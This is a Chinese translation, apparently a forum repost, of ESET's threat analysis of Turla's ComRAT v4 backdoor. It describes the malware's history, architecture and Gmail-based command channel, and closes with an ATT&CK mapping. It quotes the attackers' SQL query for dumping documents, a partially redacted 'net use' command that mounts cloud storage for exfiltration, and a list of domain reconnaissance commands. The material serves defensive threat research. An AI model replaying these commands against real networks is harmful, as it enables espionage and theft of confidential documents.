ESET研究人员发现了在Turla组织下,属于最古老的恶意软件之一的ComRAT,产生了新的版本。 Turla,也被称为Snake,是一个臭名昭著的间谍组织,已经活跃了十多年。 前面我们已经介绍过的很多攻击活动都可以归咎到Turla组织。
ComRAT也被称为Agent.BTZ,同时它的开发者们也称它为Chinch。它是一种远程访问木马(RAT),因在2008年造成了美军基地的大规模感染而名声大噪。ComRAT的第一版本可能是在2007年发布的,拥有可以通过可移动设备传播的蠕虫属性。之后两个新的主要版本在2007年到2012年之间发布,两者都使用了著名的Turla XOR秘钥:
1dM3uu4j7Fw4sjnbcwlDqet4F7JyuUi4m5Imnxl1pzxI6as80cbLnmz54cs5Ldn4ri3do5L6gs923HL34x2f5cvd0fk6c1a0s
一直到2017年年中,Turla的开发者才开始对ComRAT进行了一些修改,但是这些变体显然还是从相同的代码库中派生的。
详情参见:从Agent.BTZ到ComRAT v4:十年的历程
之后在2017年末,我们注意到完全不同的ComRAT版本已经发布。 这个新版本使用了全新的代码库,并且比以前的版本复杂得多。 下面是该恶意软件家族的主要特征:
根据攻击对象和TTP(Tactics, techniques and procedures),我们相信ComRAT是被Turla组织使用的。 由下面几个信息我们将ComRAT v4联系到Turla:
通过我们的调查,我们了解到Turla攻击者在受感染机器上所做的操作。
ComRAT的主要用途是窃取机密文件。 在一种情况下,攻击者甚至部署了.NET可执行文件,以与受害者的包含公司内部组织文档的中央MS SQL Server数据库进行交互。 图1是已编辑的SQL命令。
sqlCommand.CommandText = "select top " + num2.ToString() + " filename, img, datalength(img), id from <Redacted> with(nolock) where not img is null and id>" + num4.ToString(); sqlCommand.CommandText += " and datalength(img)<1500000 and (filename like '%.doc' or filename like '%.docx' or filename like '[0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9]%.pdf' or (filename like '3%.pdf' and len(filename)>9))"; sqlCommand.CommandText += " order by id";
图1. SQL命令从中央数据库中转储文档(部分已编辑)
然后将这些文档压缩并传输到云存储提供商,例如OneDrive或4shared。 使用net use命令安装云存储,如图2所示。
tracert -h 10 yahoo.com net use https://docs.live.net/E65<redacted> <redacted password> /u:<redacted>@aol.co.uk tracert -h 10 yahoo.com
图2. Command to mount a OneDrive folder using net use (partially redacted)
除了窃取文件外,攻击者还运行许多命令来收集有关Active Directory组或用户,网络或Microsoft Windows配置(例如组策略)的信息。 图3是由Turla攻击者执行的命令的列表。
gpresult /z gpresult /v gpresult net view net view /domain netstat netstat -nab netstat -nao nslookup 127.0.0.1 ipconfig /all arp -a net share net use systeminfo net user net user administrator net user /domain net group net group /domain net localgroup net localgroup net localgroup Administrators net group "Domain Computers" /domain net group "Domain Admins" /domain net group "Domain Controllers" /domain dir "%programfiles%" net group "Exchange Servers" /domain net accounts net accounts /domain net view 127.0.0.1 /all net session route print ipconfig /displaydns
图3. 受感染机器的基本侦查
最后,我们还注意到Turla攻击者意识到并试图逃避安全软件。 例如,他们定期抽取与安全相关的日志文件,以了解是否已检测到其恶意软件样本。 这表明该组人员的复杂程度及其长期留在同一台计算机上的意图。
根据其看上去应该是真实的编译时间戳,ComRAT v4的第一个已知示例于2017年4月进行了编译。据我们所知,最新的后门版本是在2019年11月进行编译的。
基于ESET所掌握的资料,我们认为ComRAT是使用现有立足点(例如,受感染的凭证)或通过另一个Turla后门安装的。 例如我们看到PowerStallion安装了ComRAT,PowerStallion是我们在2019年描述的基于PowerShell的后门程序。
ComRAT安装程序是一个PowerShell脚本,可创建Windows计划的任务并用加密的有效负载填充注册表值。
ComRAT v4具有以下组件:
图4是ComRAT架构的概览图。
图4. ComRAT架构概览图
ComRAT v4具有两个不同的C&C通道:HTTP(内部称为旧版),想当然地使用HTTP协议,和使用Gmail Web界面的电子邮件(内部称为mail)。
在后一种模式下,使用配置中存储的cookie,它会连接到Gmail Web界面,以便检查收件箱并下载包含加密命令的特定邮件附件。 这些命令由攻击者从另一个地址发送,该地址通常托管在其他免费电子邮件提供商(例如GMX)上。
对所有ComRAT组件的详细技术分析,请参阅此白皮书。
ComRAT v4是于2017年发布的经过全面改造的恶意软件系列。其开发人员从其他Turla后门(例如Snake)汲取了灵感,以构建非常复杂的恶意软件。
它最有趣的功能是使用Gmail网络UI接收命令并提取数据。 因此,它不依赖任何恶意域,因此可以绕过某些安全控制。 我们还注意到,此新版本放弃了COM对象劫持的持久性使用,该方法使恶意软件具有通用名称。
我们发现有迹象表明ComRAT v4在2020年初仍在使用,这表明Turla小组仍然非常活跃,对外交官和军队构成了重大威胁。
完整的危害指标(IoC)和示例列表可在我们的白皮书和GitHub存储库中找到。有关对后门的详细分析,请参阅我们的白皮书。 如有任何疑问,或要提交与该主题相关的样本,请通过[email protected]与我们联系。
Tactic | Id | Name | Description |
---|---|---|---|
Execution | T1086 | PowerShell | A PowerShell script is used to install ComRAT. |
Persistence | T1053 | Scheduled Task | ComRAT uses a scheduled task to launch its PowerShell loader. |
Defense Evasion | T1027 | Obfuscated Files or Information | The ComRAT orchestrator is stored encrypted and only decrypted upon execution. |
Defense Evasion | T1055 | Process Injection | The ComRAT orchestrator is injected into explorer.exe . The communication DLL is injected into the default browser. |
Defense Evasion | T1112 | Modify Registry | The ComRAT orchestrator is stored encrypted in the Registry. |
Discovery | T1016 | System Network Configuration Discovery | Operators execute ipconfig and nbstat . |
Discovery | T1033 | System Owner/User Discovery | Operators execute net user . |
Discovery | T1069 | Permission Groups Discovery | Operators execute net group /domain . |
Discovery | T1082 | System Information Discovery | Operators execute systeminfo . |
Discovery | T1083 | File and Directory Discovery | Operators list the content of several directories. Example: dir /og-d "%userprofile%\AppData\Roaming\Microsoft\Windows\Recent*.*". |
Discovery | T1087 | Account Discovery | Operators execute net user and net group . |
Discovery | T1120 | Peripheral Device Discovery | Operators execute fsutil fsinfo drives to list the connected drives. |
Discovery | T1135 | Network Share Discovery | Operators execute net view . |
Collection | T1213 | Data from Information Repositories | The Operators use a custom tool to exfiltrate documents from an internal central database. |
Command and Control | T1024 | Custom Cryptographic Protocol | ComRAT uses RSA and AES to encrypt C&C data. |
Command and Control | T1043 | Commonly Used Port | ComRAT uses ports 80 and 443. |
Command and Control | T1071 | Standard Application Layer Protocol | ComRAT uses HTTP and HTTPS. |
Command and Control | T1102 | Web Service | ComRAT can be controlled via the Gmail web UI. |
Exfiltration | T1002 | Data Compressed | The documents are compressed in a RAR archive. |
Exfiltration | T1022 | Data Encrypted | The RAR archive is encrypted with a password. |
Exfiltration | T1048 | Exfiltration Over Alternative Protocol | Data is exfiltrated to cloud storage, mounted locally using the net usecommand. |
翻译:看雪翻译小组 一壶葱茜
校对:看雪翻译小组 lipss
原文地址:https://www.welivesecurity.com/2020/05/26/agentbtz-comratv4-ten-year-journey/
[培训]高研班成果展示、认证、线下班,《安卓高级研修班(网课)》9月班开始招生!挑战极限、工资翻倍!
最后于 1天前 被一壶葱茜编辑 ,原因: 整理表格